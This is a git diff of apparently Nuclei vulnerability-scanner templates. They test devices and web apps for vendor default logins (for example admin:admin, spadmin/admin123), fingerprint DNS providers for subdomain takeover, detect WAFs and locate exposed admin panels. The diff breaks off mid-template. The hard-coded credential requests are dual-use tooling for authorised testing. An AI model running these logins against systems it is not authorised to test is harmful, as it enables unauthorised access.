diff --git a/default-logins/spectracom/spectracom-default-credential.yaml b/default-logins/spectracom/spectracom-default-credential.yaml
new file mode 100644
index 0000000000..408747ba1f
--- /dev/null
+++ b/default-logins/spectracom/spectracom-default-credential.yaml
@@ -0,0 +1,32 @@
+id: spectracom-default-credential
+
+info:
+ name: Spectracom Default creds
+ author: madrobot
+ severity: medium
+ tags: spectracom,default-login
+
+requests:
+ - raw:
+ - |
+ POST /users/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 98
+ Connection: close
+
+ data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "spectracom"
+ - "deleted"
+ part: header
+ condition: and
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml
new file mode 100644
index 0000000000..95d6c454af
--- /dev/null
+++ b/default-logins/szhe/szhe-default-password.yaml
@@ -0,0 +1,33 @@
+id: szhe-default-password
+
+info:
+ name: Szhe Default Password
+ author: pikpikcu
+ severity: low
+ tags: szhe,default-login
+ vendor: https://github.com/Cl0udG0d/SZhe_Scan
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/login/"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ email=springbird@qq.com&password=springbird&remeber=true
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - 'You should be redirected automatically to target URL: / '
+
+ - type: word
+ words:
+ - 'Set-Cookie: session'
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/viewpoint/trilithic-viewpoint-default.yaml b/default-logins/viewpoint/trilithic-viewpoint-default.yaml
new file mode 100644
index 0000000000..6cd0fc44e6
--- /dev/null
+++ b/default-logins/viewpoint/trilithic-viewpoint-default.yaml
@@ -0,0 +1,33 @@
+id: trilithic-viewpoint-default
+
+info:
+ name: Trilithic Viewpoint Default Credentials
+ author: davidmckennirey
+ severity: high
+ description: |
+ Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application.
+ tags: default-login,trilithic,viewpoint
+
+requests:
+ - raw:
+ - |
+ POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 65
+ Content-Type: application/json
+ Cookie: trilithic_win_auth=false
+
+ {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"authorized":true'
+ - 'redirectUrl'
+ part: body
+ condition: and
\ No newline at end of file
diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml
new file mode 100644
index 0000000000..c4bb066e85
--- /dev/null
+++ b/default-logins/visionhub/visionhub-default-credentials.yaml
@@ -0,0 +1,27 @@
+id: visionhub-default-credentials
+
+info:
+ name: VisionHub Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on VisionHub application.
+ tags: visionhub,default-login
+ reference: https://www.qognify.com/products/visionhub/
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/VisionHubWebApi/api/Login'
+ headers:
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: admin"
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/wifisky/wifisky-default-password.yaml b/default-logins/wifisky/wifisky-default-password.yaml
new file mode 100644
index 0000000000..ece1a116da
--- /dev/null
+++ b/default-logins/wifisky/wifisky-default-password.yaml
@@ -0,0 +1,38 @@
+id: wifisky-default-password
+
+info:
+ name: Wifisky Default Password
+ author: pikpikcu
+ severity: high
+ tags: default-login,wifisky
+
+requests:
+ - raw:
+ - |
+ POST /login.php?action=login&type=admin HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Connection: close
+
+ username=admin&password=admin
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - '"success":"true"'
+ - '"data":'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml
new file mode 100644
index 0000000000..3eb0a84a80
--- /dev/null
+++ b/default-logins/xxljob/xxljob-default-login.yaml
@@ -0,0 +1,38 @@
+id: xxljob-default-login
+
+info:
+ name: XXL-JOB default login
+ author: pdteam
+ severity: high
+ tags: default-login,xxljob
+ reference: https://github.com/xuxueli/xxl-job
+
+requests:
+ - raw:
+ - |
+ POST /xxl-job-admin/login HTTP/1.1
+ Host:{{Hostname}}
+ Content-Length: 30
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ userName=admin&password=123456
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"code":200'
+ - '"msg"'
+ - '"content"'
+ condition: and
+
+ - type: word
+ words:
+ - 'application/json'
+ - 'XXL_JOB_LOGIN_IDENTITY'
+ part: header
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml
index 1f49eb7496..da0f08e602 100644
--- a/default-logins/zabbix/zabbix-default-credentials.yaml
+++ b/default-logins/zabbix/zabbix-default-credentials.yaml
@@ -2,9 +2,9 @@ id: zabbix-default-credentials
info:
name: Zabbix Default Credentials
- author: pd-team
+ author: pdteam
severity: critical
- tags: zabbix,dlogin
+ tags: zabbix,default-login
requests:
- method: POST
diff --git a/default-logins/zmanda/zmanda-default-credential.yaml b/default-logins/zmanda/zmanda-default-credential.yaml
new file mode 100644
index 0000000000..f8a52ed7c7
--- /dev/null
+++ b/default-logins/zmanda/zmanda-default-credential.yaml
@@ -0,0 +1,29 @@
+id: zmanda-default-credential
+
+info:
+ name: Zmanda Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on Zmanda application.
+ reference: https://www.zmanda.com
+ tags: zmanda,default-login
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/ZMC_Admin_Login'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: zmc_cookies_enabled=true
+
+ body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "ZMC - Backup Set Management"
+
+ - type: status
+ status:
+ - 200
diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml
index c10b79fcbc..616db8eb2e 100644
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@@ -2,7 +2,7 @@ id: azure-takeover-detection
info:
name: Azure takeover detection
- author: "pdnuclei - projectdiscovery.io"
+ author: pdteam
severity: high
tags: dns,takeover
diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml
new file mode 100644
index 0000000000..c2a6153bfd
--- /dev/null
+++ b/dns/can-i-take-over-dns.yaml
@@ -0,0 +1,232 @@
+id: can-i-take-over-dns
+
+info:
+ name: Can I Take Over DNS - Fingerprint
+ author: pdteam
+ severity: info
+ tags: dns,ns,takeover
+ reference: https://github.com/indianajson/can-i-take-over-dns
+
+dns:
+ - name: "{{FQDN}}"
+ type: NS
+ class: inet
+ recursion: true
+ retries: 3
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: 000domains
+ condition: or
+ words:
+ - "ns1.000domains.com"
+ - "ns2.000domains.com"
+ - "fwns1.000domains.com"
+ - "fwns2.000domains.com"
+
+ - type: word
+ name: azure
+ condition: or
+ words:
+ - ".azure-dns.com"
+ - ".azure-dns.net"
+ - ".azure-dns.org"
+ - ".azure-dns.info"
+
+ - type: word
+ name: bizland
+ condition: or
+ words:
+ - "ns1.bizland.com"
+ - "ns2.bizland.com"
+
+ - type: word
+ name: cloudflare
+ words:
+ - "ns.cloudflare.com"
+
+ - type: word
+ name: digitalocean
+ condition: or
+ words:
+ - "ns1.digitalocean.com"
+ - "ns2.digitalocean.com"
+ - "ns2.digitalocean.com"
+
+ - type: word
+ name: dnsmadeeasy
+ words:
+ - ".dnsmadeeasy.com"
+
+ - type: word
+ name: dnsimple
+ condition: or
+ words:
+ - "ns1.dnsimple.com"
+ - "ns2.dnsimple.com"
+ - "ns3.dnsimple.com"
+ - "ns4.dnsimple.com"
+
+ - type: word
+ name: domain
+ condition: or
+ words:
+ - "ns1.domain.com"
+ - "ns2.domain.com"
+
+ - type: word
+ name: dotster
+ condition: or
+ words:
+ - "ns1.dotster.com"
+ - "ns2.dotster.com"
+
+ - type: word
+ name: easydns
+ condition: or
+ words:
+ - "dns1.easydns.com"
+ - "dns2.easydns.com"
+ - "dns3.easydns.com"
+ - "dns4.easydns.com"
+
+ - type: word
+ name: googledomains
+ words:
+ - ".googledomains.com"
+
+ - type: word
+ name: hurricane-electric
+ condition: or
+ words:
+ - "ns1.he.net"
+ - "ns2.he.net"
+ - "ns3.he.net"
+ - "ns4.he.net"
+ - "ns5.he.net"
+
+ - type: word
+ name: linode
+ condition: or
+ words:
+ - "ns1.linode.com"
+ - "ns1.linode.com"
+
+ - type: word
+ name: mediatemple
+ condition: or
+ words:
+ - "ns1.mediatemple.net"
+ - "ns2.mediatemple.net"
+
+ - type: word
+ name: mydomain
+ condition: or
+ words:
+ - "ns1.mydomain.com"
+ - "ns2.mydomain.com"
+
+ - type: word
+ name: name
+ words:
+ - ".name.com"
+
+ - type: word
+ name: nsone
+ words:
+ - ".nsone.net"
+
+ - type: word
+ name: tierranet
+ condition: or
+ words:
+ - "ns1.domaindiscover.com"
+ - "ns2.domaindiscover.com"
+
+ - type: word
+ name: yahoo
+ condition: or
+ words:
+ - "yns1.yahoo.com"
+ - "yns2.yahoo.com"
+
+ - type: word
+ name: domainpeople
+ condition: or
+ words:
+ - "ns1.domainpeople.com"
+ - "ns2.domainpeople.com"
+
+ - type: word
+ name: hover
+ condition: or
+ words:
+ - "ns1.hover.com"
+ - "ns2.hover.com"
+
+ - type: word
+ name: networksolutions
+ words:
+ - ".worldnic.com"
+
+ - type: word
+ name: activision
+ words:
+ - ".activision.com"
+
+ - type: word
+ name: aws-route53
+ words:
+ - ".awsdns-"
+
+ - type: word
+ name: apple
+ condition: or
+ words:
+ - "a.ns.apple.com"
+ - "b.ns.apple.com"
+ - "c.ns.apple.com"
+ - "d.ns.apple.com"
+
+ - type: word
+ name: capitalone
+ condition: or
+ words:
+ - "ns1.capitalone.com"
+ - "ns2.capitalone.com"
+ - "ns3.capitalone.com"
+
+ - type: word
+ name: csust
+ condition: or
+ words:
+ - "0xd0a1.csust.netm"
+ - "0xd0a2.csust.net"
+ - "0xd0a3.csust.net"
+ - "0xd0a4.csust.net"
+
+ - type: word
+ name: disney
+ condition: or
+ words:
+ - "ns1.twdcns.com"
+ - "ns2.twdcns.com"
+ - "ns3.twdcns.info"
+ - "ns4.twdcns.info"
+ - "ns5.twdcns.co.uk"
+ - "ns6.twdcns.co.uk"
+
+ - type: word
+ name: lowes
+ condition: or
+ words:
+ - "authns1.lowes.com"
+ - "authns2.lowes.com"
+
+ - type: word
+ name: tmobile
+ condition: or
+ words:
+ - "ns10.tmobileus.com"
+ - "ns10.tmobileus.net"
diff --git a/dns/cname-service-detector.yaml b/dns/cname-service-detector.yaml
index 60874e5f04..fe586cd0ce 100644
--- a/dns/cname-service-detector.yaml
+++ b/dns/cname-service-detector.yaml
@@ -2,7 +2,7 @@ id: cname-service-detector
info:
name: 3rd party service checker
- author: pd-team
+ author: pdteam
severity: info
tags: dns
diff --git a/dns/dead-host-with-cname.yaml b/dns/dead-host-with-cname.yaml
deleted file mode 100644
index b770519f5e..0000000000
--- a/dns/dead-host-with-cname.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: dead-host-with-cname
-
-info:
- name: dead-host-with-cname
- author: pdnuclei - projectdiscovery.io
- severity: info
- tags: dns
-
-dns:
- - name: "{{FQDN}}"
- type: A
- class: inet
- recursion: true
- retries: 5
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "NXDOMAIN"
-
- - type: word
- words:
- - "IN\tCNAME"
diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml
new file mode 100644
index 0000000000..053e8816a9
--- /dev/null
+++ b/dns/detect-dangling-cname.yaml
@@ -0,0 +1,34 @@
+id: detect-dangling-cname
+
+info:
+ name: Detect Dangling cname
+ author: pdteam,nytr0gen
+ severity: info
+ tags: dns,takeover
+ reference: |
+ - https://securitytrails.com/blog/subdomain-takeover-tips
+ - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
+ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
+ - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
+
+dns:
+ - name: "{{FQDN}}"
+ type: A
+ class: inet
+ recursion: true
+ retries: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "NXDOMAIN"
+
+ - type: word
+ words:
+ - "IN\tCNAME"
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - "IN\tCNAME\t(.+)"
diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml
new file mode 100644
index 0000000000..2c7870a1f1
--- /dev/null
+++ b/dns/dns-waf-detect.yaml
@@ -0,0 +1,172 @@
+id: dns-waf-detect
+
+info:
+ name: DNS WAF Detection
+ author: lu4nx
+ severity: info
+ tags: tech,waf,dns
+
+dns:
+ - name: "{{FQDN}}"
+ type: CNAME
+ recursion: true
+ retries: 5
+ class: inet
+
+ - name: "{{FQDN}}"
+ type: NS
+ recursion: true
+ retries: 5
+ class: inet
+
+ matchers:
+ - type: word
+ name: sanfor-shield
+ words:
+ - ".sangfordns.com"
+
+ - type: word
+ name: 360panyun
+ words:
+ - ".360panyun.com"
+
+ - type: word
+ name: baiduyun
+ words:
+ - ".yunjiasu-cdn.net"
+
+ - type: word
+ name: chuangyudun
+ words:
+ - ".365cyd.cn"
+ - ".cyudun.net"
+
+ - type: word
+ name: knownsec
+ words:
+ - ".jiashule.com"
+ - ".jiasule.org"
+
+ - type: word
+ name: huaweicloud
+ words:
+ - ".huaweicloudwaf.com"
+
+ - type: word
+ name: xinliuyun
+ words:
+ - ".ngaagslb.cn"
+
+ - type: word
+ name: chinacache
+ words:
+ - ".chinacache.net"
+ - ".ccgslb.net"
+
+ - type: word
+ name: nscloudwaf
+ words:
+ - ".nscloudwaf.com"
+
+ - type: word
+ name: wangsu
+ words:
+ - ".wsssec.com"
+ - ".lxdns.com"
+ - ".wscdns.com"
+ - ".cdn20.com"
+ - ".cdn30.com"
+ - ".ourplat.net"
+ - ".wsdvs.com"
+ - ".wsglb0.com"
+ - ".wswebcdn.com"
+ - ".wswebpic.com"
+ - ".wsssec.com"
+ - ".wscloudcdn.com"
+ - ".mwcloudcdn.com"
+
+ - type: word
+ name: qianxin
+ words:
+ - ".360safedns.com"
+ - ".360cloudwaf.com"
+
+ - type: word
+ name: baiduyunjiasu
+ words:
+ - ".yunjiasu-cdn.net"
+
+ - type: word
+ name: anquanbao
+ words:
+ - ".anquanbao.net"
+
+ - type: regex
+ name: aliyun
+ regex:
+ - '\.w\.kunlun\w{2,3}\.com'
+
+ - type: regex
+ name: aliyun-waf
+ regex:
+ - '\.aliyunddos\d+\.com'
+ - '\.aliyunwaf\.com'
+ - '\.aligaofang\.com'
+ - '\.aliyundunwaf\.com'
+
+ - type: word
+ name: xuanwudun
+ words:
+ - ".saaswaf.com"
+ - ".dbappwaf.cn"
+
+ - type: word
+ name: yundun
+ words:
+ - ".hwwsdns.cn"
+ - ".yunduncname.com"
+
+ - type: word
+ name: knownsec-ns
+ words:
+ - ".jiasule.net"
+
+ - type: word
+ name: chuangyudun
+ words:
+ - ".365cyd.net"
+
+ - type: word
+ name: qianxin
+ words:
+ - ".360wzb.com"
+
+ - type: word
+ name: anquanbao
+ words:
+ - ".anquanbao.com"
+
+ - type: word
+ name: wangsu
+ words:
+ - ".chinanetcenter.com"
+
+ - type: word
+ name: baiduyunjiasue
+ words:
+ - ".ns.yunjiasu.com"
+
+ - type: word
+ name: chinacache
+ words:
+ - ".chinacache.com"
+
+ - type: word
+ name: cloudflare
+ words:
+ - "ns.cloudflare.com"
+
+ - type: word
+ name: edns
+ words:
+ - ".iidns.com"
diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml
new file mode 100644
index 0000000000..7c64193c85
--- /dev/null
+++ b/dns/dnssec-detection.yaml
@@ -0,0 +1,22 @@
+id: dnssec-detection
+
+info:
+ name: DNSSEC Detection
+ description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
+ author: pdteam
+ severity: info
+ tags: dns,dnssec
+ reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
+
+dns:
+ - name: "{{FQDN}}"
+ type: DS
+ class: inet
+ recursion: true
+ retries: 3
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - "IN\tDS\t(.+)"
diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml
new file mode 100644
index 0000000000..f8f9b9a950
--- /dev/null
+++ b/dns/ec2-detection.yaml
@@ -0,0 +1,21 @@
+id: ec2-detection
+
+info:
+ name: AWS EC2 detection
+ author: melbadry9
+ severity: info
+ tags: dns,ec2,aws
+ reference: https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state
+
+dns:
+ - name: "{{FQDN}}"
+ type: CNAME
+ class: inet
+ recursion: true
+ retries: 2
+
+ extractors:
+ - type: regex
+ regex:
+ - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com"
+ - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com"
diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml
index d6148de6d9..99fabbc4f5 100644
--- a/dns/servfail-refused-hosts.yaml
+++ b/dns/servfail-refused-hosts.yaml
@@ -2,7 +2,7 @@ id: servfail-refused-hosts
info:
name: Servfail Host Finder
- author: pd-team
+ author: pdteam
severity: info
tags: dns
diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml
new file mode 100644
index 0000000000..9832542bb3
--- /dev/null
+++ b/dns/worksites-detection.yaml
@@ -0,0 +1,19 @@
+id: detect-worksites
+
+info:
+ name: worksites.net service detection
+ author: melbadry9
+ severity: info
+ tags: dns
+ reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites
+
+dns:
+ - name: "{{FQDN}}"
+ type: A
+ class: inet
+ recursion: true
+ retries: 2
+ matchers:
+ - type: word
+ words:
+ - "69.164.223.206"
diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml
index 5584c76461..ea5abea227 100644
--- a/exposed-panels/active-admin-exposure.yaml
+++ b/exposed-panels/active-admin-exposure.yaml
@@ -2,8 +2,9 @@ id: active-admin-exposure
info:
name: ActiveAdmin Admin Dasboard Exposure
- author: pd-team
+ author: pdteam
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml
index 8d5ad08cb3..fcc93b5236 100644
--- a/exposed-panels/activemq-panel.yaml
+++ b/exposed-panels/activemq-panel.yaml
@@ -2,8 +2,9 @@ id: activemq-panel
info:
name: Apache ActiveMQ Exposure
- author: pd-team
+ author: pdteam
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml
new file mode 100644
index 0000000000..151404574c
--- /dev/null
+++ b/exposed-panels/acunetix-panel.yaml
@@ -0,0 +1,24 @@
+id: acunetix-panel-detect
+
+info:
+ name: Acunetix Panel detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/#/login"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Acunetix '
+ - ' '
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml
index ad0d8ad875..c00d3449c5 100644
--- a/exposed-panels/adminer-panel.yaml
+++ b/exposed-panels/adminer-panel.yaml
@@ -1,121 +1,26 @@
id: adminer-panel
info:
name: Adminer Login panel
- author: random-robbie
- severity: medium
+ author: random_robbie,meme-lord
+ severity: info
+ reference: https://blog.sorcery.ie/posts/adminer/
+ tags: panel
- # Older versions suffer from LFI but also handy if you find mysql creds
+ # <= 4.2.4 can have unauthenticated RCE via SQLite driver
+ # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL
+ # Most versions have some kind of SSRF usability
+ # Is generally handy if you find SQL creds
requests:
- method: GET
path:
- - '{{BaseURL}}/adminer-4.7.0.php'
- - '{{BaseURL}}/adminer-4.6.0-mysql-en.php'
- - '{{BaseURL}}/adminer/adminer.php'
- - '{{BaseURL}}/adminer-4.6.0-en.php'
- - '{{BaseURL}}/adminer-4.6.2-mysql.php'
- - '{{BaseURL}}/adminer-4.6.1-mysql.php'
- - '{{BaseURL}}/adminer-4.7.2.php'
- - '{{BaseURL}}/adminer-4.0.1/'
- - '{{BaseURL}}/adminer-4.6.3-mysql-en.php'
- - '{{BaseURL}}/adminer-4.3.1-mysql-en.php'
- - '{{BaseURL}}/adminer-3.3.1/'
- - '{{BaseURL}}/adminer-3.6.1/'
- - '{{BaseURL}}/adminer-4.6.2.php'
- - '{{BaseURL}}/adminer-4.0.3.php'
- - '{{BaseURL}}/adminer-4.3.0.php'
- - '{{BaseURL}}/adminer-4.6.1.php'
- - '{{BaseURL}}/adminer-4.2.5-en.php'
- - '{{BaseURL}}/data/adminer.php'
- - '{{BaseURL}}/adminer/index.php'
- - '{{BaseURL}}/adminer-4.2.0.php'
- - '{{BaseURL}}/adminer-4.5.0-mysql.php'
- - '{{BaseURL}}/admin/adminer.php'
- - '{{BaseURL}}/adminer-4.7.2-mysql.php'
- - '{{BaseURL}}/adminer-4.2.2/'
- - '{{BaseURL}}/adminer-4.5.0.php'
- - '{{BaseURL}}/adminer-3.6.0/'
- - '{{BaseURL}}/webadminer.php'
- - '{{BaseURL}}/adminer-4.0.3/'
- - '{{BaseURL}}/adminer-4.1.0.php'
- - '{{BaseURL}}/adminer-3.3.2/'
- - '{{BaseURL}}/adminer-4.6.2-en.php'
- - '{{BaseURL}}/adminer-4.7.1-mysql.php'
- - '{{BaseURL}}/public/adminer.php'
- - '{{BaseURL}}/adminer-4.1.0/'
- - '{{BaseURL}}/adminer-4.5.0-en.php'
- - '{{BaseURL}}/adminer-4.2.4/'
- - '{{BaseURL}}/adminer-4.6.2-mysql-en.php'
- - '{{BaseURL}}/adminer.php'
- - '{{BaseURL}}/adminer-4.7.0-mysql-en.php'
- - '{{BaseURL}}/adminer-4.4.0-mysql.php'
- - '{{BaseURL}}/adminer-4.3.1.php'
- - '{{BaseURL}}/adminer-4.6.0-mysql.php'
- - '{{BaseURL}}/adminer-4.2.3/'
- '{{BaseURL}}/_adminer.php'
- - '{{BaseURL}}/adminer-3.3.3/'
- - '{{BaseURL}}/adminer-3.3.0/'
- - '{{BaseURL}}/php/adminer.php'
- - '{{BaseURL}}/adminer-3.1.0/'
- - '{{BaseURL}}/adminer-4.6.3-mysql.php'
- - '{{BaseURL}}/adminer-4.7.2-mysql-en.php'
- - '{{BaseURL}}/adminer-4.4.0-en.php'
- - '{{BaseURL}}/publicadminer.php'
- - '{{BaseURL}}/adminer1.php'
- - '{{BaseURL}}/adminer-4.7.3-mysql.php'
- - '{{BaseURL}}/adminer-4.6.3-en.php'
- - '{{BaseURL}}/adminer-4.2.5-mysql-en.php'
- - '{{BaseURL}}/adminer-3.0.0/'
- - '{{BaseURL}}/adminer-3.5.0/'
- - '{{BaseURL}}/adminer-3.6.4/'
- - '{{BaseURL}}/adminer-4.7.3-mysql-en.php'
- - '{{BaseURL}}/adminer-3.2.2/'
- - '{{BaseURL}}/adminer-3.0.1/'
- - '{{BaseURL}}/tools/adminer.php'
- - '{{BaseURL}}/adminer-4.7.1.php'
- - '{{BaseURL}}/adminer-4.0.3-mysql.php'
- - '{{BaseURL}}/adminer-4.2.5-mysql.php'
- - '{{BaseURL}}/adminer-3.5.1/'
- - '{{BaseURL}}/adminer-3.6.3/'
- - '{{BaseURL}}/adminer-4.3.0-mysql-en.php'
- - '{{BaseURL}}/web/adminer.php'
- - '{{BaseURL}}/adminer-3.2.1/'
- '{{BaseURL}}/adminer/'
- - '{{BaseURL}}/adminer-4.6.2-cs.php'
- - '{{BaseURL}}/adminer-4.2.0-mysql.php'
- - '{{BaseURL}}/adminer-4.5.0-mysql-en.php'
- - '{{BaseURL}}/adminer-4.3.1-mysql.php'
- - '{{BaseURL}}/adminer-4.1.0-mysql.php'
- - '{{BaseURL}}/adminer-4.7.1-mysql-en.php'
- - '{{BaseURL}}/adminer-4.3.1-en.php'
- - '{{BaseURL}}/adminer-4.7.0-en.php'
- - '{{BaseURL}}/adminer-4.6.1-mysql-en.php'
- - '{{BaseURL}}/adminer-4.7.2-en.php'
- - '{{BaseURL}}/adminer-4.2.0/'
- - '{{BaseURL}}/adminer-3.6.2/'
- - '{{BaseURL}}/adminer-4.4.0-mysql-en.php'
- - '{{BaseURL}}/toolsadminer.php'
- - '{{BaseURL}}/adminer-3.7.0/'
- - '{{BaseURL}}/adminer-4.2.5.php'
- - '{{BaseURL}}/adminer-3.2.0/'
- - '{{BaseURL}}/adminer-4.4.0.php'
- - '{{BaseURL}}/adminer-4.7.3.php'
- - '{{BaseURL}}/adminer-4.3.0-en.php'
- - '{{BaseURL}}/adminer-4.6.3.php'
- - '{{BaseURL}}/adminer-4.0.2/'
+ - '{{BaseURL}}/adminer.php'
+ - '{{BaseURL}}/editor.php'
+ - '{{BaseURL}}/mysql.php'
+ - '{{BaseURL}}/sql.php'
- '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
- - '{{BaseURL}}/adminer-3.4.0/'
- - '{{BaseURL}}/adminer-4.0.0/'
- - '{{BaseURL}}/adminer-4.7.1-en.php'
- - '{{BaseURL}}/adminer-4.3.0-mysql.php'
- - '{{BaseURL}}/adminer-4.2.1/'
- - '{{BaseURL}}/adminer-4.6.0.php'
- - '{{BaseURL}}/adminer-3.7.1/'
- - '{{BaseURL}}/adminadminer.php'
- - '{{BaseURL}}/adminer-3.3.4/'
- - '{{BaseURL}}/adminer-4.6.1-en.php'
- - '{{BaseURL}}/adminer-4.7.3-en.php'
- - '{{BaseURL}}/adminer-4.7.0-mysql.php'
matchers-condition: and
matchers:
@@ -127,3 +32,10 @@ requests:
- type: status
status:
- 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '([0-9.]+)'
\ No newline at end of file
diff --git a/exposed-panels/adobe-component-login.yaml b/exposed-panels/adobe-component-login.yaml
new file mode 100644
index 0000000000..b00b2c9b7f
--- /dev/null
+++ b/exposed-panels/adobe-component-login.yaml
@@ -0,0 +1,23 @@
+id: adobe-component-login
+
+info:
+ name: Adobe Component Brower Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6846
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/CFIDE/componentutils/login.cfm'
+ - '{{BaseURL}}/cfide/componentutils/login.cfm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Component Browser Login '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/adobe-connect-central-login.yaml b/exposed-panels/adobe-connect-central-login.yaml
new file mode 100644
index 0000000000..1218c9f8d7
--- /dev/null
+++ b/exposed-panels/adobe-connect-central-login.yaml
@@ -0,0 +1,23 @@
+id: adobe-connect-central-login
+
+info:
+ name: Adobe Connect Central Login
+ author: dhiyaneshDk
+ severity: info
+ tags: adobe,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Adobe Connect Central Login '
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/adobe-experience-manager-login.yaml b/exposed-panels/adobe-experience-manager-login.yaml
new file mode 100644
index 0000000000..2c1f158cea
--- /dev/null
+++ b/exposed-panels/adobe-experience-manager-login.yaml
@@ -0,0 +1,23 @@
+id: adobe-experience-manager-login
+
+info:
+ name: Adobe-Experience-Manager
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
+ tags: panel,aem
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/libs/granite/core/content/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'AEM Sign In '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/adobe-media-server.yaml b/exposed-panels/adobe-media-server.yaml
new file mode 100644
index 0000000000..deaf55913a
--- /dev/null
+++ b/exposed-panels/adobe-media-server.yaml
@@ -0,0 +1,23 @@
+id: adobe-media-server
+
+info:
+ name: Adobe Media Server
+ author: dhiyaneshDK
